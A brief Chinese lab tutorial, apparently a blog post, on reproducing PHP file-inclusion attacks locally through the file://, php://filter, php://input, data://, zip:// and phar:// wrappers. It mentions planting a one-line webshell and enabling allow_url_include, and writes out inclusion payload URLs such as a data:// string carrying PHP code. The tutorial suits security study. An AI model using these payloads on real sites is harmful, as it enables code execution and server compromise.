文件包含PHP伪协议利用方法 本地复现

环境配置

步骤一:更改参数
php.ini ⾥有两个重要的参数 allow_url_fopen 、allow_url_include


步骤二:创建123.php文件输入一句话木马

步骤三:创建1.php

less-1 file://协议

123.php?cmd=file://D:\phpstudy_pro\WWW\1.php

less-2 php://filter协议


base解码

less-3 php://input协议

123.php?cmd=php://input利用burp抓包

更改传参方式

更改参数进行放包

less-4 data://

123.php?cmd=data:text/plain,<?php phpinfo();?>

less-5 zip://

创建2.txt文件进行压缩

123.php?cmd=zip://D:\phpstudy_pro\WWW\2.zip%232.txt

less-6 phar://

123.php?cmd=phar://D:\phpstudy_pro\WWW\2.zip\2.txt

相关推荐
上位机付工9 分钟前
上位机通信速度有多快?
开发语言·c#·上位机·plc
蔗理苦10 分钟前
2025-09-05 CSS4——浮动与定位
开发语言·前端·css·html·css3
给我个面子中不13 分钟前
JUC、JVM八股补充
java·开发语言·jvm
hqxstudying1 小时前
Kafka 深入研究:从架构革新到性能优化的全面解析
java·开发语言·微服务·kafka·springcloud
lskblog2 小时前
Composer安装教程及国内镜像设置(含腾讯云、阿里云镜像)
阿里云·php·腾讯云·laravel·composer
悟能不能悟7 小时前
js闭包问题
开发语言·前端·javascript
潼心1412o7 小时前
C语言(长期更新)第15讲 指针详解(五):习题实战
c语言·开发语言
Murphy_lx8 小时前
Lambda表达式
开发语言·c++
yangpipi-8 小时前
C++并发编程-23. 线程间切分任务的方法
开发语言·c++